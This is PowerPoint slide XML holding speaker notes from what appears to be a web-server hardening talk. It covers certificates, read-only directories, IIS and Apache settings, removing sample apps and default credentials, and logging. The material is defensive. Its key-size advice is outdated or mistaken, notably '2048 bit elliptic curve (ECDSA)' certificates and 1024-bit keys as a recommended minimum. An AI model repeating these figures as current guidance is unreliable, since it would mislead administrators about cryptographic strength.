              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web server check - https://sslcheck.casecurity.org/en_US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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25271895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web server needs a certificate if you are going to use TLS.  Certificates expire.  DON’T RUN WITH AN EXPIRED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> CERTIFICATE – keep your certs up-to-date.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Several reasons – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>You do NOT want your users to get used to “accepting the risks”.  They WILL get used to this if you force them by running on an expired certificate. And when an attacker installs a MITM, the user will “automatically” accept the risk… Not implying that your users are trained monkeys, so don’t take this the wrong way…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Older certificates my be using a weaker encryption scheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> – recommended currently is at least 1024 bit key (many older certs are 128 - 512 bit keys).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Newer certs can use EC (elliptic curve) which is even better (fewer bits required to accomplish same level of security).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Perferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are 2048 bit elliptic curve (ECDSA) certs – make sure to import EC roots as noted earlier if you use EC suites</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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17284863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successful web server exploits add “back doors” to the systems that they compromise in order to ensure ongoing access to the system even after the original vulnerability is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>patched.  This is often accomplished by modifying configuration files (IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, php.ini/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wp-config.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.)  , served data (include files, html files, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files, etc.),  or adding code to the system (themes, plugins, uploads directory, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).  All of these avenues of exposure can be stopped if the directories containing these assets are read-only to the public facing web server. (you can have read-write access from another internal-only secure server that is “down” at all times EXCEPT when you need to modify these items, and is inaccessible from any unsafe locations outside of your local network).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In addition to making directories read-only, you can also add further protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/IIS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Machine.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>allowOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>customErrors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> mode=”On” (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RemoteOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-	trace enabled=”false”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-	compilation debug=”false”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpCookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpOnlyCookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=”true”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-	forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cookieless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UseCookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” (make sure to use SSL to protect session cookie from hijacking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deny_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and allow only what’s needed (whitelist)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Of course, these should be in RO directories as well…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While it is true that an attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that can get super-user access to your OS (root, admin) can change RO to RW status, this provides a fairly “high bar” that the attacker has to hurdle in order to damage your system, and stops most of the “web server only” attacks before they can start.  And if they can elevate their privilege to change RO status, you’re pretty much “cooked” already anyway…</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1966319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“Top Ten” web site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> detected in 2010 and 2013. Some of the vulnerabilities have changed a few positions in the rankings in those 3 years but the actual vulnerabilities contained in the list  hasn’t changed much over the years. The same vulnerabilities are still around… but the methods used to exploit the vulnerability have been refined and have become (much) more  sophisticated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The “red” boxed items above are due directly or indirectly to insufficient “validation/sanitization” of user supplied input data.  This represents 30% of the top ten list (3 out of 10), but in numbers of occurrences, is far greater.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>All listed vulnerabilities –except– the fuchsia boxed items (A9 and A5 in 2013) can be mitigated by web developers (require some coding changes).  A9 and A5 (2013 list) are more likely infrastructure issues – BUT if you are a developer who is using “old” frameworks, etc., “because that’s what has been provided,” you should put pressure on the infrastructure folks to upgrade/re-configure  ASAP (because of issue A9).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>I recommend strongly that web developers have a look at the “Source: pdf” noted above, which provides a detailed description and examples of each of these 10 vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Important note:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>THERE ARE MANY MORE THAN 10 ISSUES – DON’T STOP WHEN YOU HAVE CORRECTED THE TOP TEN ! ! !  GO AFTER –ALL– EXPOSURES. This list shows only the top ten of potentially MANY possible vulnerabilities. ANY vulnerability can be exploited by an attacker, so you need to address ALL vulnerabilities (eventually).  Use this list as a “triage guide” to prioritize your plan for attacking these vulnerabilities.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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39494333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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> lists for most software.  The more software that you enable, the more exploit lists that are relevant to your site.  The more relevant lists, the more exploits an attacker can use against your site.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Don’t be “that {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>girl|guy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>}” running all of the available software (and therefore exposed to --ALL-- of the exploits on the exploit lists…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Just run what you actually need.  Completely remove the rest, if possible.  If you’re not sure, at least DISABLE/PROHIBIT questionable stuff – you can always re-enable it if you need to… and as a side effect – depending upon WHAT you remove/disable - performance could even improve!! (although performance is NOT the main reason for trimming cruft…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disable all services that allow remote writing to your public facing servers: FTP, SSH, telnet, Samba, RPC, etc., have all had security issues in the past, and will continue to have more security issues in the future (pretty much guaranteed), so DISABLE them if you don’t absolutely need them. You can perform these functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (when necessary for you to update your http, JavaScript, etc.) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from your “other” server (the internal-only one that has read-write access), OR (if absolutely necessary), you COULD start the service (FTP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, whatever) for a short time in order to allow you to update, then shut it down when you’re done (but DON’T FORGET TO DISABLE WHEN DONE!!!).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even if you disable/prohibit any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> functions, make sure that you keep them patched. Attackers may discover a way to enable these features, or you may enable them to perform some action, and forget to disable them when you’re done, etc.</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16424411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programs are typically provided by most vendors to show how to use a particular feature of their software. Of course, the sample shows “how easy it is” to use the feature. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In order to reduce the complexity of the sample program (and make it appear to be super-easy to use), typically only the minimum code to use the feature is provided. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validation/sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and error handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (and all other non-feature related code) is usually very skimpy, and in many cases non-existent – so these programs can be a giant “hole” that attackers can use to breach your system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make certain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to eliminate them completely (physically remove all sample applications) from your system.</a:t>
            </a:r>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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4683391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Attackers can take shortcuts if they know what initialization parameters, log directories,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> etc., your web site uses. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you are using any GET requests, they might find interesting data in your log files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NO non-web-page related information should be in directories “below” your web root directory – all server specific information should be under OTHER directories so that an attacker can’t (easily) access.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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9222763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may be up to infrastructure team at your site, or it could be up to developers.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In any case, whichever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> team you’re on, check to make certain that there is no “intermingling” of code at your site, and fix it - or notify “the other guys” to fix it.</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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105308717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 assets usually “spill” more information than you want attackers to know about. Test JavaScript scripts may allow an attacker to discern information about your database structure, or show the attacker how to access “other” information about your site that you’d be better off them NOT knowing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you’ve followed Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Rule #6, this is easy – just don’t copy the test asset directory to the production web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you haven’t followed  IR #6, re-think!!!</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36852654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“verify” means “actually try it and make SURE that unauthorized users can’t access ANY admin asset”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>placing the admin stuff on a different web server that is NOT accessible from outside your network. This would restrict all “admin” (or other sensitive) processing to users on your local network, and keep all “outsiders” at bay. “Outside” accessible web site could have READ ONLY access to asset files, which would make it much more difficult for any outsider to “add features” to your web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Of course, there’d be no administering from offsite locations, unless you use a VPN to “pretend” your local… so there are some considerations and trade-offs involved…</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30335487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only way to make sure that the exploits that you THINK you have closed are ACTUALLY closed is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to test (again) after making your corrections.</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38187019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certain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to REMOVE any “default” credentials from your system.  Attackers are likely to guess “admin/password” (and others).  Lists of default passwords for various applications, devices, etc., are available on the internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.cirt.net/passwords</a:t>
            </a:r>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8623412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Attackers will use anything that they can find on your site.  Don’t let them find stuff…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Of course, obscurity is NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> security, but don’t make the attacker’s job even easier by providing the roadmap to all of your assets.</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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26302907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Logs can help you discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> nefarious activities on your web site.  You should be logging everything that you can – web server, database, application server, business logic, etc. Useful information may also be gleaned from OS logs (security, system, application processing, etc.), network devices, firewall logs, IDS/IPS logs, anti-virus logs, history files, and whatever else might be “in the path” of an attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>At a minimum, your logs should contain a timestamp, source identification (source IP address, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>), action (command/request issued), referrer/user agent (web server), status codes, and anything else that might help.  Note that the timestamp is critical, as you may need to correlate events across multiple log files (web logs don’t capture business logic, so you’ll need to access data from multiple logs for most research).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NOTE: if the activity you are investigating MIGHT be legally actionable, consult an attorney BEFORE you start poking around in the log files – you don’t want to disqualify any potential evidence by accidentally performing some action that the courts – or a defense attorney - might deem questionable.  BUT you should make sure that any ammo the prosecutor might need is in the logs by “customizing” what goes into your log files.  Obviously, it is preferable that you add these “prosecutorial enhancements” to your logs BEFORE you have an issue that requires them…  </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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="987826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items in the “top ten” are related to data validation/sanitization.  “Bad” (or skipped) validation/sanitization is responsible for various injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> attacks (SQL, LDAP, XPATH, SSI, command, etc.), XSS and CSRF  attacks, and can also result in buffer overflows and other exploitable issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NOTE:  The items in the following pages are not presented in “priority” order.  Instead, they are grouped by exposure/function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
